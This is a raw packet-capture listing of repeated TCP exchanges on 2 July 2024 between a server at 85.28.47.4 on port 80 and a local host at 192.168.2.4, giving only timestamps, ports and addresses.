                                            Jul 2, 2024 08:26:26.662414074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.662427902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.662432909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.662432909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.662432909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.662441015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.662453890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.662472010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.662472010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.662482023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.662502050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.662708998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.662722111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.662733078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.662744999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.662756920 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.662759066 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.662787914 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.662802935 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.663008928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663022041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663033009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663044930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663057089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.663058043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663083076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.663105011 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.663258076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663300991 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.663387060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663403988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663415909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663428068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663435936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.663439035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663444042 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.663451910 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663464069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663466930 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.663475990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663486004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663492918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.663511992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.663532019 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.663877010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.663933039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664084911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664096117 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664107084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664118052 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664128065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664129019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664139986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664141893 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664151907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664164066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664167881 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664175987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664186954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664187908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664200068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664206028 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664227962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664248943 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664762974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664776087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664787054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664798021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664808989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664817095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664819956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664832115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664848089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664848089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664848089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664860964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664870977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664871931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.664895058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.664917946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.744359016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744400978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744407892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744451046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744462967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744472980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744492054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744585037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.744585037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.744585037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.744585037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.744674921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744687080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744699001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744721889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.744739056 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.744887114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744899035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744935036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.744965076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744976997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744987011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.744997978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745011091 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745035887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745239019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745249987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745265961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745276928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745281935 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745286942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745299101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745306015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745330095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745341063 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745634079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745645046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745678902 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745690107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745769024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745788097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745799065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745810032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745810986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745821953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745836973 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745837927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745851040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745860100 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745862961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745872974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.745877981 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745901108 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.745923042 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.746263027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746274948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746284962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746294975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746313095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.746337891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.746510029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746520996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746531963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746542931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746553898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746556044 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.746565104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746575117 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746578932 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.746587992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.746604919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.746618986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.746646881 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747065067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747076035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747087002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747097969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747107983 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747108936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747118950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747127056 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747131109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747142076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747149944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747153044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747165918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747168064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747185946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747204065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747590065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747601032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747612000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747634888 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747646093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747668028 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747680902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747690916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747701883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747704983 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747713089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747725010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747731924 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747735023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747745991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747756004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.747761965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747776985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.747800112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751014948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751068115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751075983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751087904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751113892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751125097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751130104 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751146078 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751164913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751261950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751274109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751285076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751295090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751316071 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751341105 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751401901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751441002 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751471996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751482964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751513958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751528978 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751574039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751585007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751595974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751606941 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751621008 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751638889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751715899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751727104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751737118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751749039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751756907 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751760960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751796961 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751816034 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.751935959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.751971960 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.752031088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752042055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752053022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752062082 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.752072096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752077103 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.752084970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752095938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752095938 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.752106905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752114058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.752127886 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.752151966 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.752300978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752347946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.752444983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752456903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752468109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752479076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752487898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.752494097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752505064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752513885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.752516031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.752530098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.752553940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.826927900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.826962948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.826972961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827076912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.827091932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827104092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827114105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827126980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827156067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.827178955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.827300072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827311039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827322960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827333927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827369928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.827393055 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.827533007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827545881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827557087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827569008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827579975 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.827593088 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.827624083 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.827739000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.827780962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.833334923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833345890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833384037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833406925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.833456993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.833477020 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833487988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833499908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833517075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.833539009 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.833693981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833705902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833717108 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833734035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.833760023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.833780050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.833844900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833858013 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833868980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.833885908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.833909035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834028959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834041119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834074974 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834096909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834172964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834183931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834202051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834213972 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834222078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834227085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834234953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834238052 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834263086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834291935 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834536076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834546089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834564924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834575891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834578991 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834585905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834598064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834616899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834644079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834916115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834927082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834944010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834954023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834958076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834964991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834973097 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.834976912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.834995985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.835027933 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.835211992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835227966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835247040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835253954 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.835258007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835268974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835278988 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.835279942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835292101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835300922 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.835303068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835326910 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.835345030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.835724115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835735083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835753918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835763931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.835767031 CEST6388080192.168.2.485.28.47.4
